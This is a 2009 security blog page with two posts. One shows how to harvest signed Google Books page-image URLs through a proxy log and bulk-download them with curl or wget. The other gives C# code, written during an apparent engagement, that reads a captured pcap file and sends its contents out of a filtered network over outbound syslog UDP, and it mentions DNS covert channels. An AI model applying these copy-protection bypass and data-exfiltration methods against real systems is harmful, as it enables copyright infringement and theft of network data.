This summary is not available. Please click here to view the post.
Monday, June 29, 2009
Tuesday, June 2, 2009
Google Books Spidering
I don't usually read books on Google Books. The scans are not of the best quality and they do not allow me to conveniently print a page or two for offline reading. This is apparently discouraged by Google. It's supposed to be a "demo" site for further buying experience and I am fine with that.
This post is not meant to discuss the merits of "crippled" demos. I actually wanted to talk a little about content protection Google chose to employ for the content.
In my mind, if you are trying to prevent content sifting or crawling ( and the obviously do since there is a copyright notice on every page), you should evaluate more methods of protection than obfuscating Javascript code fetching images of scanned pages into the browser. You should not rely on AJAX calls to eliminate first generation spidering (href). You should not allow incomplete URL parameter randomization, and you SHOULD tie requests to an existing session.
So, on to the example.
Suppose I like Ruby by Example Book, and I do not agree with Google's TOS, and I want to use the book's content for my own purposes.
Every page of the book scan I am interested in gets fetched with XHR from google and rendered in the browser. Breaking on the request and following it around lands me into the following format JSON response.
Content-Type: application/javascript; charset=UTF-8
Server: OFE/0.1
Content-Length: 2496
{"page":[{"pid":"PR21","src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg","highlights":[{"X":370,"Y":51,"W":26,"H":11},{"X":139,"Y":93,"W":19,"H":10},{"X":218,"Y":119,"W":19,"H":10},{"X":352,"Y":186,"W":26,"H":11},{"X":230,"Y":214,"W":25,"H":11},{"X":417,"Y":255,"W":26,"H":11},{"X":493,"Y":269,"W":23,"H":11},{"X":370,"Y":449,"W":25,"H":11},{"X":402,"Y":490,"W":26,"H":11},{"X":139,"Y":585,"W":22,"H":11},{"X":320,"Y":614,"W":23,"H":11},{"X":146,"Y":681,"W":21,"H":9},{"X":158,"Y":690,"W":20,"H":9},{"X":139,"Y":699,"W":20,"H":9}],"flags":0,"order":22,"uf":"http://books.google.com/books_feedback?id=kq2dBNdAl3IC\x26spid=ygOBAha9Lj5wEmJbb7L0E4AMedYBAAAAEwAAAAvsLgsil0rRCj9QbBB0CmBqRC_Lik05VtZnyTK-XBfQ\x26ftype=0","vq":"ruby by
..... Many more goes here.
This blob is processed by and obfuscated long-name JS file which puts into the DOM and renders in the browser. Let's say it's irrelevant at the moment.
Look at the following snippet from JSON response:
"src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg
OK, \x26 is really &. Otherwise, it's a valid url 3-time zoomed image of page 21 of the book id=kq2dBNdAl3IC .
Also there is a dynamic signature of the page at the end: sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg
Every page of this book has different signature. However, look at the following 2 requests:
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA
There is a non-random element at the beginning of the payload. I am not going to go into how we can try and brute force or fuzz the signature here, or how to read client-side JS file to figure out what that signature consists of. The point is that the content navigation is not tied to session cookies or any other UI navigation data. Simple GET on the URL fetches the image of a page.
All you have to do now it to set your favorite web proxy to log URLs for JPEGs conforming to ".*sig=ACfU3U.*" and iterate the pages. You don't even need to capture the content yet.
Google does the job of fetching all the pages once you start mouse-scrolling in the book DIV. So you scroll through the whole book, then you go to you proxy log and pick up the following records (substituting the \x26 -> & ).
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA105&img=1&zoom=3&hl=en&sig=ACfU3U0SJesKmEQ2HUl2ntgNVBIrLK7UHQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA106&img=1&zoom=3&hl=en&sig=ACfU3U3i-gOkxdtYfeGLd7CFsRGZiPnT_Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA107&img=1&zoom=3&hl=en&sig=ACfU3U0FbGnYvyAY2T6uGV9rA-bY0J4cvw
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA10&img=1&zoom=3&hl=en&sig=ACfU3U3B0rfiUmevGsmVHgLEDN3sxANqkg
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA11&img=1&zoom=3&hl=en&sig=ACfU3U3uXbNxXALDKMG-OZ2bEGVlzN3JaA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA13&img=1&zoom=3&hl=en&sig=ACfU3U0Bb32Lu4L9KzlCRS1gbURVfNcklA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA14&img=1&zoom=3&hl=en&sig=ACfU3U1HVLZyKZBfm9y01Ly-Lp6AEo7B8Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA15&img=1&zoom=3&hl=en&sig=ACfU3U3aVGlHL9Sph_ttbm7tfSWVNyyFMQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA16&img=1&zoom=3&hl=en&sig=ACfU3U1CFrpu9LiQwuS1HIcsYu6qBrNppg
You now plug it into the script (curl will do, so will wget) to fetch the book's content.
Now, I have not researched it enough, but I wonder if Watir or Selenium, or other browser automation frameworks can scroll the content for you and automate the process altogether.
I don't encourage anyone to actually copy Google's content - go buy the book if you like it, because the people who suffer most from copying are the authors.
However, the idea here is - how does Google plan to protect my data tomorrow if it cannot protect something it makes money on today.
Posted by snow at 2:46 PM 0 comments
Monday, June 1, 2009
Pcap2Syslog for .NET or Stuck transferring PCAP over UDP
I was recently in a situation where I wanted to transfer some fairly large .pcap file (1GB) from the internal network as part of the engagement. I did have direct HTTP connectivity to the outside (proxied and monitored for illegal sites) so I tried HTTP uploads but for some reason my transfers were getting dropped after about 5 megs into the transfer. I had no control over the issue and frankly I did not want to go even deeper than I already was. I think I was in the "3rd" tier with all nice policies applied to users like me so we are not able to waste company's time surfing the internet :) Anyway, all I had was DNS outbound for resolution, crippled HTTP and a Syslog. Don;t ask me why Syslog was enabled to the internet. Probably for monitoring or data collection purposes for manged service provider or something like that.
I started thinking of chopping my pcap into smaller chunks and doing the upload. I knew exactly what I would do on *nix and had scripts made for similar purpose but I happened to be on Windows and did not readily know what tools I would use.
So DNS or Syslog?
I did not yet research tools to allow me to chop up some binary data (such as PCAP), package them in smaller chunks ( Base 64 or not ) and shove them over DNS tunnel. I am sure they do exist and most likely many smart folks out there can point me to the ones they prefer. To date, I was ok bypassing content filtering with XML/RPC streams over HTTP(S). Not this time though.
Syslog? Well, it is foreign to Windows to begin with... What are the chances of getting the right tools fast enough to parse PCAP and transform them into syslog messages. I gather there would be enough dependencies to deter me ( or detect my activities) from doing so. Yeah, Cygwin comes to mind..
OK, start thinking outside the box. I have VS2008 so I have access to .Net libraries. But what can parse PCAP and which library can generate syslog messages? Well Syslog is a simple protocol and message generation can be accomplished with plain Sockets, something like this.
Indeed, all you need is
using System.Net;
using System.Net.Sockets;
and in a nutshell:
1. Instantiate UDP transport
udp = new UdpClient(ipAddress, 514);
2. Build Syslog String according to the RFC:
string[] strParams = { priority.ToString()+": ", time.ToString("MMM dd HH:mm:ss "),
machine,
body };
3. Send the chunk out.
rawMsg = ascii.GetBytes(string.Concat(strParams));
udp.Send(rawMsg, rawMsg.Length);
udp.Close();
Answer to the first question came in the form of Sharppcap . It;s a standalone assembly which lives in
Tamir.IPLib.SharpPcap.dll.
using System;
using System.Text;
using System.IO;
using Tamir.IPLib;
using Tamir.IPLib.Packets;
Since It can read pcaps offline I can do the following:
//Get an offline file pcap device
device = SharpPcap.GetPcapOfflineDevice(capFile);
//Open the device for capturing
device.PcapOpen();
Then, of course, you can iterate through packets like so:
while ((packet = device.PcapGetNextPacket()) != null)
{
DateTime ptime = packet.PcapHeader.Date;
int plen = packet.PcapHeader.PacketLength;
// Prints the time and length of each received packet to debug
Console.Write("{0}/{1}/{2} - {3}:{4}:{5}",
ptime.Day, ptime.Month, ptime.Year, ptime.Hour, ptime.Minute, ptime.Second);
StringBuilder sbuilder = new StringBuilder();
// Append to Message builder
sbuilder.Append(
// Either Call Syslog routines from above here,
// or call Syslog classes from here.
}
If you want to send based on filters, only what you want out of the PCAP (say, communication map to and from the host over UDP), then in a while loop you can introduce more laborate processing.
if (packet is UDPPacket) {
DateTime time = packet.Timeval.Date;
int ulen = packet.PcapHeader.PacketLength;
UDPPacket udp = (UDPPacket)packet;
string srcIp = udp.SourceAddress;
string dstIp = udp.DestinationAddress;
int srcPort = udp.SourcePort;
int dstPort = udp.DestinationPort;
Console.WriteLine(" UDP {0}:{1} -> {2}:{3}", srcIp, srcPort, dstIp, dstPort);
sbuilder.Append(String.Format(" UDP {0}:{1} -> {2}:{3}",
srcIp, srcPort, dstIp, dstPort));
// Append to Message builder here if you want
sbuilder.Append(
// Either Call Syslog routines from above here,
// or call Syslog classes from here.
} }
I turned out better than I expected. I filtered what I needed for further analysis, and my partially "interesting" data was sent in short messages over Syslog outbound.
Next, I should really look at DNS covert channels. If anyone has suggestions on tools, please let me know.
Posted by snow at 7:39 PM 0 comments